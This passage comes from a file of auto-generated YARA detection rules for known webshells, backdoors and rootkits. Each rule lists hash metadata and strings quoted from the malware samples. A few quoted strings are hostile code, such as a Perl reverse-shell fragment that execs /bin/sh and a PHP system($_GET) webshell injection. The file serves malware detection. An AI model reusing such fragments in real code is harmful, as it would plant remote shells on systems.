"ION\\System\\FloatingPo" condition: all of them } rule Simple_PHP_BackDooR { meta: description = "Webshells Auto-generated - file Simple_PHP_BackDooR.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "a401132363eecc3a1040774bec9cb24f" strings: $s0 = "<hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory he" $s6 = "if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fn" $s9 = "// a simple php backdoor" condition: 1 of them } rule sig_2005Gray { meta: description = "Webshells Auto-generated - file 2005Gray.asp" author = "Yara Bulk Rule Generator by Florian Roth" hash = "75dbe3d3b70a5678225d3e2d78b604cc" strings: $s0 = "SCROLLBAR-FACE-COLOR: #e8e7e7;" $s4 = "echo \" <a href=\"\"/\"&encodeForUrl(theHref,false)&\"\"\" target=_blank>\"&replace" $s8 = "theHref=mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\"),2)" $s9 = "SCROLLBAR-3DLIGHT-COLOR: #cccccc;" condition: all of them } rule DllInjection { meta: description = "Webshells Auto-generated - file DllInjection.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "a7b92283a5102886ab8aee2bc5c8d718" strings: $s0 = "\\BDoor\\DllInjecti" condition: all of them } rule Mithril_v1_45_Mithril { meta: description = "Webshells Auto-generated - file Mithril.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "f1484f882dc381dde6eaa0b80ef64a07" strings: $s2 = "cress.exe" $s7 = "\\Debug\\Mithril." condition: all of them } rule hkshell_hkrmv { meta: description = "Webshells Auto-generated - file hkrmv.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "bd3a0b7a6b5536f8d96f50956560e9bf" strings: $s5 = "/THUMBPOSITION7" $s6 = "\\EvilBlade\\" condition: all of them } rule phpshell { meta: description = "Webshells Auto-generated - file phpshell.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "1dccb1ea9f24ffbd085571c88585517b" strings: $s1 = "echo \"<input size=\\\"100\\\" type=\\\"text\\\" name=\\\"newfile\\\" value=\\\"$inputfile\\\"><b" $s2 = "$img[$id] = \"<img height=\\\"16\\\" width=\\\"16\\\" border=\\\"0\\\" src=\\\"$REMOTE_IMAGE_UR" $s3 = "$file = str_replace(\"\\\\\", \"/\", str_replace(\"//\", \"/\", str_replace(\"\\\\\\\\\", \"\\\\\", " condition: all of them } rule FSO_s_cmd { meta: description = "Webshells Auto-generated - file cmd.asp" author = "Yara Bulk Rule Generator by Florian Roth" hash = "cbe8e365d41dd3cd8e462ca434cf385f" strings: $s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" $s1 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" condition: all of them } rule FeliksPack3___PHP_Shells_phpft { meta: description = "Webshells Auto-generated - file phpft.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "60ef80175fcc6a879ca57c54226646b1" strings: $s6 = "PHP Files Thief" $s11 = "http://www.4ngel.net" condition: all of them } rule FSO_s_indexer { meta: description = "Webshells Auto-generated - file indexer.asp" author = "Yara Bulk Rule Generator by Florian Roth" hash = "135fc50f85228691b401848caef3be9e" strings: $s3 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input type=\"r" condition: all of them } rule r57shell { meta: description = "Webshells Auto-generated - file r57shell.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "8023394542cddf8aee5dec6072ed02b5" strings: $s11 = " $_POST['cmd']=\"echo \\\"Now script try connect to" condition: all of them } rule bdcli100 { meta: description = "Webshells Auto-generated - file bdcli100.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "b12163ac53789fb4f62e4f17a8c2e028" strings: $s5 = "unable to connect to " $s8 = "backdoor is corrupted on " condition: all of them } rule HYTop_DevPack_2005Red { meta: description = "Webshells Auto-generated - file 2005Red.asp" author = "Yara Bulk Rule Generator by Florian Roth" hash = "d8ccda2214b3f6eabd4502a050eb8fe8" strings: $s0 = "scrollbar-darkshadow-color:#FF9DBB;" $s3 = "echo \" <a href=\"\"/\"&encodeForUrl(theHref,false)&\"\"\" target=_blank>\"&replace" $s9 = "theHref=mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\"),2)" condition: all of them } rule HYTop2006_rar_Folder_2006X2 { meta: description = "Webshells Auto-generated - file 2006X2.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "cc5bf9fc56d404ebbc492855393d7620" strings: $s2 = "Powered By " $s3 = " \" onClick=\"this.form.sharp.name=this.form.password.value;this.form.action=this." condition: all of them } rule rdrbs084 { meta: description = "Webshells Auto-generated - file rdrbs084.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "ed30327b255816bdd7590bf891aa0020" strings: $s0 = "Create mapped port. You have to specify domain when using HTTP type." $s8 = "<LOCAL PORT> <MAPPING SERVER> <MAPPING SERVER PORT> <TARGET SERVER> <TARGET" condition: all of them } rule HYTop_CaseSwitch_2005 { meta: description = "Webshells Auto-generated - file 2005.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "8bf667ee9e21366bc0bd3491cb614f41" strings: $s1 = "MSComDlg.CommonDialog" $s2 = "CommonDialog1" $s3 = "__vbaExceptHandler" $s4 = "EVENT_SINK_Release" $s5 = "EVENT_SINK_AddRef" $s6 = "By Marcos" $s7 = "EVENT_SINK_QueryInterface" $s8 = "MethCallEngine" condition: all of them } rule eBayId_index3 { meta: description = "Webshells Auto-generated - file index3.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "0412b1e37f41ea0d002e4ed11608905f" strings: $s8 = "$err = \"<i>Your Name</i> Not Entered!</font></h2>Sorry, \\\"You" condition: all of them } rule FSO_s_phvayv { meta: description = "Webshells Auto-generated - file phvayv.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "205ecda66c443083403efb1e5c7f7878" strings: $s2 = "wrap=\"OFF\">XXXX</textarea></font><font face" condition: all of them } rule byshell063_ntboot { meta: description = "Webshells Auto-generated - file ntboot.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "99b5f49db6d6d9a9faeffb29fd8e6d8c" strings: $s0 = "SYSTEM\\CurrentControlSet\\Services\\NtBoot" $s1 = "Failure ... Access is Denied !" $s2 = "Dumping Description to Registry..." $s3 = "Opening Service .... Failure !" condition: all of them } rule FSO_s_casus15_2 { meta: description = "Webshells Auto-generated - file casus15.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "8d155b4239d922367af5d0a1b89533a3" strings: $s0 = "copy ( $dosya_gonder" condition: all of them } rule installer { meta: description = "Webshells Auto-generated - file installer.cmd" author = "Yara Bulk Rule Generator by Florian Roth" hash = "a507919ae701cf7e42fa441d3ad95f8f" strings: $s0 = "Restore Old Vanquish" $s4 = "ReInstall Vanquish" condition: all of them } rule uploader { meta: description = "Webshells Auto-generated - file uploader.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "b9a9aab319964351b46bd5fc9d6246a8" strings: $s0 = "move_uploaded_file($userfile, \"entrika.php\"); " condition: all of them } rule FSO_s_remview_2 { meta: description = "Webshells Auto-generated - file remview.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "b4a09911a5b23e00b55abe546ded691c" strings: $s0 = "<xmp>$out</" $s1 = ".mm(\"Eval PHP code\")." condition: all of them } rule FeliksPack3___PHP_Shells_r57 { meta: description = "Webshells Auto-generated - file r57.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "903908b77a266b855262cdbce81c3f72" strings: $s1 = "$sql = \"LOAD DATA INFILE \\\"\".$_POST['test3_file']." condition: all of them } rule HYTop2006_rar_Folder_2006X { meta: description = "Webshells Auto-generated - file 2006X.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "cf3ee0d869dd36e775dfcaa788db8e4b" strings: $s1 = "<input name=\"password\" type=\"password\" id=\"password\"" $s6 = "name=\"theAction\" type=\"text\" id=\"theAction\"" condition: all of them } rule FSO_s_phvayv_2 { meta: description = "Webshells Auto-generated - file phvayv.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "205ecda66c443083403efb1e5c7f7878" strings: $s2 = "rows=\"24\" cols=\"122\" wrap=\"OFF\">XXXX</textarea></font><font" condition: all of them } rule elmaliseker { meta: description = "Webshells Auto-generated - file elmaliseker.asp" author = "Yara Bulk Rule Generator by Florian Roth" hash = "ccf48af0c8c09bbd038e610a49c9862e" strings: $s0 = "javascript:Command('Download'" $s5 = "zombie_array=array(" condition: all of them } rule shelltools_g0t_root_resolve { meta: description = "Webshells Auto-generated - file resolve.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "69bf9aa296238610a0e05f99b5540297" strings: $s0 = "3^n6B(Ed3" $s1 = "^uldn'Vt(x" $s2 = "\\= uPKfp" $s3 = "'r.axV<ad" $s4 = "p,modoi$=sr(" $s5 = "DiamondC8S t" $s6 = "`lQ9fX<ZvJW" condition: all of them } rule FSO_s_RemExp { meta: description = "Webshells Auto-generated - file RemExp.asp" author = "Yara Bulk Rule Generator by Florian Roth" hash = "b69670ecdbb40012c73686cd22696eeb" strings: $s1 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=SubFolder.Name%>\"> <a href= \"<%=Request.Ser" $s5 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f=<%=F" $s6 = "<td bgcolor=\"<%=BgColor%>\" align=\"right\"><%=Attributes(SubFolder.Attributes)%></" condition: all of them } rule FSO_s_tool { meta: description = "Webshells Auto-generated - file tool.asp" author = "Yara Bulk Rule Generator by Florian Roth" hash = "3a1e1e889fdd974a130a6a767b42655b" strings: $s7 = "\"\"%windir%\\\\calc.exe\"\")" condition: all of them } rule FeliksPack3___PHP_Shells_2005 { meta: description = "Webshells Auto-generated - file 2005.asp" author = "Yara Bulk Rule Generator by Florian Roth" hash = "97f2552c2fafc0b2eb467ee29cc803c8" strings: $s0 = "window.open(\"\"&url&\"?id=edit&path=\"+sfile+\"&op=copy&attrib=\"+attrib+\"&dpath=\"+lp" $s3 = "<input name=\"dbname\" type=\"hidden\" id=\"dbname\" value=\"<%=request(\"dbname\")%>\">" condition: all of them } rule byloader { meta: description = "Webshells Auto-generated - file byloader.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "0f0d6dc26055653f5844ded906ce52df" strings: $s0 = "SYSTEM\\CurrentControlSet\\Services\\NtfsChk" $s1 = "Failure ... Access is Denied !" $s2 = "NTFS Disk Driver Checking Service" $s3 = "Dumping Description to Registry..." $s4 = "Opening Service .... Failure !" condition: all of them } rule shelltools_g0t_root_Fport { meta: description = "Webshells Auto-generated - file Fport.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "dbb75488aa2fa22ba6950aead1ef30d5" strings: $s4 = "Copyright 2000 by Foundstone, Inc." $s5 = "You must have administrator privileges to run fport - exiting..." condition: all of them } rule BackDooR__fr_ { meta: description = "Webshells Auto-generated - file BackDooR (fr).php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "a79cac2cf86e073a832aaf29a664f4be" strings: $s3 = "print(\"<p align=\\\"center\\\"><font size=\\\"5\\\">Exploit include " condition: all of them } rule FSO_s_ntdaddy { meta: description = "Webshells Auto-generated - file ntdaddy.asp" author = "Yara Bulk Rule Generator by Florian Roth" hash = "f6262f3ad9f73b8d3e7d9ea5ec07a357" strings: $s1 = "<input type=\"text\" name=\".CMD\" size=\"45\" value=\"<%= szCMD %>\"> <input type=\"s" condition: all of them } rule nstview_nstview { meta: description = "Webshells Auto-generated - file nstview.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "3871888a0c1ac4270104918231029a56" strings: $s4 = "open STDIN,\\\"<&X\\\";open STDOUT,\\\">&X\\\";open STDERR,\\\">&X\\\";exec(\\\"/bin/sh -i\\\");" condition: all of them } rule HYTop_DevPack_upload { meta: description = "Webshells Auto-generated - file upload.asp" author = "Yara Bulk Rule Generator by Florian Roth" hash = "b09852bda534627949f0259828c967de" strings: $s0 = "<!-- PageUpload Below -->" condition: all of them } rule PasswordReminder { meta: description = "Webshells Auto-generated - file PasswordReminder.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "ea49d754dc609e8bfa4c0f95d14ef9bf" strings: $s3 = "The encoded password is found at 0x%8.8lx and has a length of %d." condition: all of them } rule Pack_InjectT { meta: description = "Webshells Auto-generated - file InjectT.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "983b74ccd57f6195a0584cdfb27d55e8" strings: $s3 = "ail To Open Registry" $s4 = "32fDssignim" $s5 = "vide Internet S" $s6 = "d]Software\\M" $s7 = "TInject.Dll" condition: all of them } rule FSO_s_RemExp_2 { meta: description = "Webshells Auto-generated - file RemExp.asp" author = "Yara Bulk Rule Generator by Florian Roth" hash = "b69670ecdbb40012c73686cd22696eeb" strings: $s2 = " Then Response.Write \"" $s3 = "<a href= \"<%=Request.ServerVariables(\"script_name\")%>" condition: all of them } rule FSO_s_c99 { meta: description = "Webshells Auto-generated - file c99.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "5f9ba02eb081bba2b2434c603af454d0" strings: $s2 = "\"txt\",\"conf\",\"bat\",\"sh\",\"js\",\"bak\",\"doc\",\"log\",\"sfc\",\"cfg\",\"htacce" condition: all of them } rule rknt_zip_Folder_RkNT { meta: description = "Webshells Auto-generated - file RkNT.dll" author = "Yara Bulk Rule Generator by Florian Roth" hash = "5f97386dfde148942b7584aeb6512b85" strings: $s0 = "PathStripPathA" $s1 = "`cLGet!Addr%" $s2 = "$Info: This file is packed with the UPX executable packer http://upx.tsx.org $" $s3 = "oQToOemBuff* <=" $s4 = "ionCdunAsw[Us'" $s6 = "CreateProcessW: %S" $s7 = "ImageDirectoryEntryToData" condition: all of them } rule dbgntboot { meta: description = "Webshells Auto-generated - file dbgntboot.dll" author = "Yara Bulk Rule Generator by Florian Roth" hash = "4d87543d4d7f73c1529c9f8066b475ab" strings: $s2 = "now DOS is working at mode %d,faketype %d,against %s,has worked %d minutes,by sp" $s3 = "sth junk the M$ Wind0wZ retur" condition: all of them } rule PHP_shell { meta: description = "Webshells Auto-generated - file shell.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "45e8a00567f8a34ab1cccc86b4bc74b9" strings: $s0 = "AR8iROET6mMnrqTpC6W1Kp/DsTgxNby9H1xhiswfwgoAtED0y6wEXTihoAtICkIX6L1+vTUYWuWz" $s11 = "1HLp1qnlCyl5gko8rDlWHqf8/JoPKvGwEm9Q4nVKvEh0b0PKle3zeFiJNyjxOiVepMSpflJkPv5s" condition: all of them } rule hxdef100 { meta: description = "Webshells Auto-generated - file hxdef100.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "55cc1769cef44910bd91b7b73dee1f6c" strings: $s0 = "RtlAnsiStringToUnicodeString" $s8 = "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\" $s9 = "\\\\.\\mailslot\\hxdef-rk100sABCDEFGH" condition: all of them } rule rdrbs100 { meta: description = "Webshells Auto-generated - file rdrbs100.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "7c752bcd6da796d80a6830c61a632bff" strings: $s3 = "Server address must be IP in A.B.C.D format." $s4 = " mapped ports in the list. Currently " condition: all of them } rule Mithril_Mithril { meta: description = "Webshells Auto-generated - file Mithril.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "017191562d72ab0ca551eb89256650bd" strings: $s0 = "OpenProcess error!" $s1 = "WriteProcessMemory error!" $s4 = "GetProcAddress error!" $s5 = "HHt`HHt\\" $s6 = "Cmaudi0" $s7 = "CreateRemoteThread error!" $s8 = "Kernel32" $s9 = "VirtualAllocEx error!" condition: all of them } rule hxdef100_2 { meta: description = "Webshells Auto-generated - file hxdef100.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "1b393e2e13b9c57fb501b7cd7ad96b25" strings: $s0 = "\\\\.\\mailslot\\hxdef-rkc000" $s2 = "Shared Components\\On Access Scanner\\BehaviourBlo" $s6 = "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\" condition: all of them } rule Release_dllTest { meta: description = "Webshells Auto-generated - file dllTest.dll" author = "Yara Bulk Rule Generator by Florian Roth" hash = "76a59fc3242a2819307bb9d593bef2e0" strings: $s0 = ";;;Y;`;d;h;l;p;t;x;|;" $s1 = "0 0&00060K0R0X0f0l0q0w0" $s2 = ": :$:(:,:0:4:8:D:`=d=" $s3 = "4@5P5T5\\5T7\\7d7l7t7|7" $s4 = "1,121>1C1K1Q1X1^1e1k1s1y1" $s5 = "9 9$9(9,9P9X9\\9`9d9h9l9p9t9x9|9" $s6 = "0)0O0\\0a0o0\"1E1P1q1" $s7 = "<.<I<d<h<l<p<t<x<|<" $s8 = "3&31383>3F3Q3X3`3f3w3|3" $s9 = "8@;D;H;L;P;T;X;\\;a;9=W=z=" condition: all of them } rule webadmin { meta: description = "Webshells Auto-generated - file webadmin.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "3a90de401b30e5b590362ba2dde30937" strings: $s0 = "<input name=\\\"editfilename\\\" type=\\\"text\\\" class=\\\"style1\\\" value='\".$this->inpu" condition: all of them } rule commands { meta: description = "Webshells Auto-generated - file commands.asp" author = "Yara Bulk Rule Generator by Florian Roth" hash = "174486fe844cb388e2ae3494ac2d1ec2" strings: $s1 = "If CheckRecord(\"SELECT COUNT(ID) FROM VictimDetail WHERE VictimID = \" & VictimID" $s2 = "proxyArr = Array (\"HTTP_X_FORWARDED_FOR\",\"HTTP_VIA\",\"HTTP_CACHE_CONTROL\",\"HTTP_F" condition: all of them } rule hkdoordll { meta: description = "Webshells Auto-generated - file hkdoordll.dll" author = "Yara Bulk Rule Generator by Florian Roth" hash = "b715c009d47686c0e62d0981efce2552" strings: $s6 = "Can't uninstall,maybe the backdoor is not installed or,the Password you INPUT is" condition: all of them } rule r57shell_2 { meta: description = "Webshells Auto-generated - file r57shell.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "8023394542cddf8aee5dec6072ed02b5" strings: $s2 = "echo \"<br>\".ws(2).\"HDD Free : <b>\".view_size($free).\"</b> HDD Total : <b>\".view_" condition: all of them } rule Mithril_v1_45_dllTest { meta: description = "Webshells Auto-generated - file dllTest.dll" author = "Yara Bulk Rule Generator by Florian Roth" hash = "1b9e518aaa62b15079ff6edb412b21e9" strings: $s3 = "syspath" $s4 = "\\Mithril" $s5 = "--list the services in the computer" condition: all of them } rule dbgiis6cli { meta: description = "Webshells Auto-generated - file dbgiis6cli.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "3044dceb632b636563f66fee3aaaf8f3" strings: $s0 = "User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" $s5 = "###command:(NO more than 100 bytes!)" condition: all of them } rule remview_2003_04_22 { meta: description = "Webshells Auto-generated - file remview_2003_04_22.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "17d3e4e39fbca857344a7650f7ea55e3" strings: $s1 = "\"<b>\".mm(\"Eval PHP code\").\"</b> (\".mm(\"don't type\").\" \\\"<?\\\"" condition: all of them } rule FSO_s_test { meta: description = "Webshells Auto-generated - file test.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "82cf7b48da8286e644f575b039a99c26" strings: $s0 = "$yazi = \"test\" . \"\\r\\n\";" $s2 = "fwrite ($fp, \"$yazi\");" condition: all of them } rule Debug_cress { meta: description = "Webshells Auto-generated - file cress.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "36a416186fe010574c9be68002a7286a" strings: $s0 = "\\Mithril " $s4 = "Mithril.exe" condition: all of them } rule webshell { meta: description = "Webshells Auto-generated - file webshell.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "f2f8c02921f29368234bfb4d4622ad19" strings: $s0 = "RhViRYOzz" $s1 = "d\\O!jWW" $s2 = "bc!jWW" $s3 = "0W[&{l" $s4 = "[INhQ@\\" condition: all of them } rule FSO_s_EFSO_2 { meta: description = "Webshells Auto-generated - file EFSO_2.asp" author = "Yara Bulk Rule Generator by Florian Roth" hash = "a341270f9ebd01320a7490c12cb2e64c" strings: $s0 = ";!+/DRknD7+.\\mDrC(V+kcJznndm\\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl\"dKVcJ\\CslU,),@!0KxD~mKV" $s4 = "\\co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX\"b~/fAs!u&9|J\\grKp\"j" condition: all of them } rule thelast_index3 { meta: description = "Webshells Auto-generated - file index3.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "cceff6dc247aaa25512bad22120a14b4" strings: $s5 = "$err = \"<i>Your Name</i> Not Entered!</font></h2>Sorry, \\\"Your Name\\\" field is r" condition: all of them } rule adjustcr { meta: description = "Webshells Auto-generated - file adjustcr.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "17037fa684ef4c90a25ec5674dac2eb6" strings: $s0 = "$Info: This file is packed with the UPX executable packer $" $s2 = "$License: NRV for UPX is distributed under special license $" $s6 = "AdjustCR Carr" $s7 = "ION\\System\\FloatingPo" condition: all of them } rule FeliksPack3___PHP_Shells_xIShell { meta: description = "Webshells Auto-generated - file xIShell.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "997c8437c0621b4b753a546a53a88674" strings: $s3 = "if (!$nix) { $xid = implode(explode(\"\\\\\",$xid),\"\\\\\\\\\");}echo (\"<td><a href='Java" condition: all of them } rule HYTop_AppPack_2005 { meta: description = "Webshells Auto-generated - file 2005.asp" author = "Yara Bulk Rule Generator by Florian Roth" hash = "63d9fd24fa4d22a41fc5522fc7050f9f" strings: $s6 = "\" onclick=\"this.form.sqlStr.value='e:\\hytop.mdb" condition: all of them } rule xssshell { meta: description = "Webshells Auto-generated - file xssshell.asp" author = "Yara Bulk Rule Generator by Florian Roth" hash = "8fc0ffc5e5fbe85f7706ffc45b3f79b4" strings: $s1 = "if( !getRequest(COMMANDS_URL + \"?v=\" + VICTIM + \"&r=\" + generateID(), \"pushComma" condition: all of them } rule FeliksPack3___PHP_Shells_usr { meta: description = "Webshells Auto-generated - file usr.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "ade3357520325af50c9098dc8a21a024" strings: $s0 = "<?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor" condition: all of them } rule FSO_s_phpinj { meta: description = "Webshells Auto-generated - file phpinj.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "dd39d17e9baca0363cc1c3664e608929" strings: $s4 = "echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';" condition: all of them } rule xssshell_db { meta: description = "Webshells Auto-generated - file db.asp" author = "Yara Bulk Rule Generator by Florian Roth" hash = "cb62e2ec40addd4b9930a9e270f5b318" strings: $s8 = "'// By Ferruh Mavituna | http://ferruh.mavituna.com" condition: all of them } rule PHP_sh { meta: description = "Webshells Auto-generated - file sh.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "1e9e879d49eb0634871e9b36f99fe528" strings: $s1 = "\"@$SERVER_NAME \".exec(\"pwd\")" condition: all of them } rule xssshell_default { meta: description = "Webshells Auto-generated - file default.asp" author = "Yara Bulk Rule Generator by Florian Roth" hash = "d156782ae5e0b3724de3227b42fcaf2f" strings: $s3 = "If ProxyData <> \"\" Then ProxyData = Replace(ProxyData, DATA_SEPERATOR, \"<br />\")" condition: all of them } rule EditServer_2 { meta: description = "Webshells Auto-generated - file EditServer.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "5c1f25a4d206c83cdfb006b3eb4c09ba" strings: $s0 = "@HOTMAIL.COM" $s1 = "Press Any Ke" $s3 = "glish MenuZ" condition: all of them } rule by064cli { meta: description = "Webshells Auto-generated - file by064cli.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "10e0dff366968b770ae929505d2a9885" strings: $s7 = "packet dropped,redirecting" $s9 = "input the password(the default one is 'by')" condition: all of them } rule Mithril_dllTest { meta: description = "Webshells Auto-generated - file dllTest.dll" author = "Yara Bulk Rule Generator by Florian Roth" hash = "a8d25d794d8f08cd4de0c3d6bf389e6d" strings: $s0 = "please enter the password:" $s3 = "\\dllTest.pdb" condition: all of them } rule peek_a_boo { meta: description = "Webshells Auto-generated - file peek-a-boo.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "aca339f60d41fdcba83773be5d646776" strings: $s0 = "__vbaHresultCheckObj" $s1 = "\\VB\\VB5.OLB" $s2 = "capGetDriverDescriptionA" $s3 = "__vbaExceptHandler" $s4 = "EVENT_SINK_Release" $s8 = "__vbaErrorOverflow" condition: all of them } rule fmlibraryv3 { meta: description = "Webshells Auto-generated - file fmlibraryv3.asp" author = "Yara Bulk Rule Generator by Florian Roth" hash = "c34c248fed6d5a20d8203924a2088acc" strings: $s3 = "ExeNewRs.CommandText = \"UPDATE \" & tablename & \" SET \" & ExeNewRsValues & \" WHER" condition: all of them } rule Debug_dllTest_2 { meta: description = "Webshells Auto-generated - file dllTest.dll" author = "Yara Bulk Rule Generator by Florian Roth" hash = "1b9e518aaa62b15079ff6edb412b21e9" strings: $s4 = "\\Debug\\dllTest.pdb" $s5 = "--list the services in the computer" condition: all of them } rule connector { meta: description = "Webshells Auto-generated - file connector.asp" author = "Yara Bulk Rule Generator by Florian Roth" hash = "3ba1827fca7be37c8296cd60be9dc884" strings: $s2 = "If ( AttackID = BROADCAST_ATTACK )" $s4 = "Add UNIQUE ID for victims / zombies" condition: all of them } rule shelltools_g0t_root_HideRun { meta: description = "Webshells Auto-generated - file HideRun.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "45436d9bfd8ff94b71eeaeb280025afe" strings: $s0 = "Usage -- hiderun [AppName]" $s7 = "PVAX SW, Alexey A. Popoff, Moscow, 1997." condition: all of them } rule regshell { meta: description = "Webshells Auto-generated - file regshell.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "db2fdc821ca6091bab3ebd0d8bc46ded" strings: $s0 = "Changes the base hive to HKEY_CURRENT_USER." $s4 = "Displays a list of values and sub-keys in a registry Hive." $s5 = "Enter a menu selection number (1 - 3) or 99 to Exit: " condition: all of them } rule PHP_Shell_v1_7 { meta: description = "Webshells Auto-generated - file PHP_Shell_v1.7.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "b5978501c7112584532b4ca6fb77cba5" strings: $s8 = "<title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]" condition: all of them } rule xssshell_save { meta: description = "Webshells Auto-generated - file save.asp" author = "Yara Bulk Rule Generator by Florian Roth" hash = "865da1b3974e940936fe38e8e1964980" strings: $s4 = "RawCommand = Command & COMMAND_SEPERATOR & Param & COMMAND_SEPERATOR & AttackID" $s5 = "VictimID = fm_NStr(Victims(i))" condition: all of them } rule screencap { meta: description = "Webshells Auto-generated - file screencap.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "51139091dea7a9418a50f2712ea72aa6" strings: $s0 = "GetDIBColorTable" $s1 = "Screen.bmp" $s2 = "CreateDCA" condition: all of them } rule FSO_s_phpinj_2 { meta: description = "Webshells Auto-generated - file phpinj.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "dd39d17e9baca0363cc1c3664e608929" strings: $s9 = "<? system(\\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 INTO" condition: all of them } rule ZXshell2_0_rar_Folder_zxrecv { meta: description = "Webshells Auto-generated - file zxrecv.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "5d3d12a39f41d51341ef4cb7ce69d30f" strings: $s0 = "RyFlushBuff" $s1 = "teToWideChar^FiYP" $s2 = "mdesc+8F D" $s3 = "\\von76std" $s4 = "5pur+virtul" $s5 = "- Kablto io" $s6 = "ac#f{lowi8a" condition: all of them } rule FSO_s_ajan { meta: description = "Webshells Auto-generated - file ajan.asp" author = "Yara Bulk Rule Generator by Florian Roth" hash = "22194f8c44524f80254e1b5aec67b03e" strings: $s4 = "entrika.write \"BinaryStream.SaveToFile" condition: all of them } rule c99shell { meta: description = "Webshells Auto-generated - file c99shell.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "90b86a9c63e2cd346fe07cea23fbfc56" strings: $s0 = "<br />Input URL: <input name=\\\"uploadurl\\\" type=\\\"text\\\"&" condition: all of them } rule phpspy_2005_full { meta: description = "Webshells Auto-generated - file phpspy_2005_full.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "d1c69bb152645438440e6c903bac16b2" strings: $s7 = "echo \" <td align=\\\"center\\\" nowrap valign=\\\"top\\\"><a href=\\\"?downfile=\".urlenco" condition: all of them } rule FSO_s_zehir4_2 { meta: description = "Webshells Auto-generated - file zehir4.asp" author = "Yara Bulk Rule Generator by Florian Roth" hash = "5b496a61363d304532bcf52ee21f5d55" strings: $s4 = "\"Program Files\\Serv-u\\Serv" condition: all of them } rule httpdoor { meta: description = "Webshells Auto-generated - file httpdoor.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "6097ea963455a09474471a9864593dc3" strings: $s4 = "''''''''''''''''''DaJKHPam" $s5 = "o,WideCharR]!n]" $s6 = "HAutoComplete" $s7 = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?> <assembly xmlns=\"urn:sch" condition: all of them } rule FSO_s_indexer_2 { meta: description = "Webshells Auto-generated - file indexer.asp" author = "Yara Bulk Rule Generator by Florian Roth" hash = "135fc50f85228691b401848caef3be9e" strings: $s5 = "<td>Nerden :<td><input type=\"text\" name=\"nerden\" size=25 value=index.html></td>" condition: all of them } rule HYTop_DevPack_2005 { meta: description = "Webshells Auto-generated - file 2005.asp" author = "Yara Bulk Rule Generator by Florian Roth" hash = 